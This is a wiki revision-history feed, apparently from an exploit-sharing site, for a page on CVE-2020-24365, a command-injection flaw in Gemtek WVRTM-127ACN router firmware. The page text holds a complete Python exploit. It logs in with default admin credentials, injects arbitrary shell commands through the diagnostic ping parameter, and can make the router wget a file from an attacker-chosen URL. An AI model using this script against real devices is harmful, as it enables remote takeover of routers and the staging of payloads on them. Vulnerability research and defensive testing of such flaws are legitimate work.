https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-24365_Gemtek_WVRTM-127ACN_01.01.02.141_%E7%B6%93%E9%81%8E%E8%AA%8D%E8%AD%89%E7%9A%84%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
CVE-2020-24365 Gemtek WVRTM-127ACN 01.01.02.141 經過認證的命令注入漏洞 - Revision history
2026-04-10T04:50:50Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-24365_Gemtek_WVRTM-127ACN_01.01.02.141_%E7%B6%93%E9%81%8E%E8%AA%8D%E8%AD%89%E7%9A%84%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=4993&oldid=prev
Pwnwiki: Marked this version for translation
2021-06-13T01:51:53Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 01:51, 13 June 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==影響版本==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==影響版本== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-4991:rev-4993 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2020-24365_Gemtek_WVRTM-127ACN_01.01.02.141_%E7%B6%93%E9%81%8E%E8%AA%8D%E8%AD%89%E7%9A%84%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=4991&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Version: 01.01.02.127, 01.01.02.141 </pre> ==EXP== <pre> # Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Aut..."
2021-06-13T01:51:11Z
<p>Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Version: 01.01.02.127, 01.01.02.141 </pre> ==EXP== <pre> # Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Aut..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==影響版本==<br />
</translate><br />
<pre><br />
Version: 01.01.02.127, 01.01.02.141<br />
</pre><br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection <br />
# Date: 13/09/2020 <br />
# Exploit Author: Gabriele Zuddas <br />
# Version: 01.01.02.127, 01.01.02.141 <br />
# CVE : CVE-2020-24365 <br />
<br />
<br />
Service Provider : Linkem<br />
Product Name : LTE CPE<br />
Model ID : WVRTM-127ACN<br />
Serial ID : GMK170418011089<br />
IMEI : XXXXXXXXXXXXX<br />
ICCID : XXXXXXXXXXXXXXXXXX<br />
Firmware Version : 01.01.02.141<br />
Firmware Creation Date : May 15 13:04:30 CST 2019<br />
Bootrom Version : U-Boot 1.1.3<br />
Bootrom Creation Date : Oct 23 2015 - 16:03:05<br />
LTE Support Band : 42,43<br />
<br />
<br />
Injecting happens here:<br />
<br />
sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&<br />
<br />
<br />
Exploit has been tested on older verions too:<br />
Firmware Version: 01.01.02.127<br />
Firmware Creation Date : May 23 15:34:10 CST 2018<br />
<br />
"""<br />
<br />
import requests, time, argparse, re, sys<br />
<br />
class Exploit():<br />
<br />
CVE = "CVE-2020-24365"<br />
<br />
def __init__(self, args):<br />
self.args = args<br />
self.session = requests.Session()<br />
<br />
def login(self):<br />
s = self.session<br />
r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password})<br />
if "sid" not in s.cookies:<br />
print("[!] Login failed.")<br />
exit(1)<br />
sid = s.cookies["sid"]<br />
s.headers = {"sid": sid}<br />
print(f"[*] Login successful! (sid={sid})")<br />
<br />
def now(self):<br />
return int(time.time() * 1000)<br />
<br />
def exploit(self, command):<br />
self.login()<br />
<br />
with self.session as s:<br />
payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}"<br />
<br />
r = s.get(payload)<br />
r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")<br />
content = str(r.content, "utf8")<br />
<br />
#Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface)<br />
r = s.get(payload)<br />
r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")<br />
content = str(r.content, "utf8")<br />
<br />
#TODO: eventually parse content with regex to clean out the output<br />
c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)<br />
print(content)<br />
print(c[0])<br />
<br />
if len(c) > 0:<br />
return c[0]<br />
else:<br />
return False<br />
<br />
def download_file(self, url):<br />
filename = url.rsplit('/', 1)[-1]<br />
<br />
if self.args.file is not None:<br />
print(f"[*] Attempting download of file '{filename}' from {url} ...")<br />
<br />
if self.exploit(f"wget {url} -O /tmp/{filename}"):<br />
print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.")<br />
print(self.exploit(f"du -h /tmp/{filename}"))<br />
return True<br />
else:<br />
print(f"[!] Failed to download {filename} from {url}")<br />
return False<br />
<br />
def run(self):<br />
if self.args.command is not None:<br />
print(self.exploit(self.args.command))<br />
exit()<br />
if self.args.file is not None:<br />
self.download_file(self.args.file)<br />
exit()<br />
<br />
if __name__ == "__main__":<br />
# Create the parser and add arguments<br />
parser = argparse.ArgumentParser()<br />
parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")<br />
parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")<br />
parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")<br />
parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")<br />
<br />
parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")<br />
<br />
args = parser.parse_args()<br />
<br />
# Run exploit<br />
X = Exploit(args)<br />
if len(sys.argv) > 1:<br />
print(f"[*] Exploiting {X.CVE} ...")<br />
X.run()<br />
else:<br />
parser.print_help(sys.stderr)<br />
<br />
</pre></div>
Pwnwiki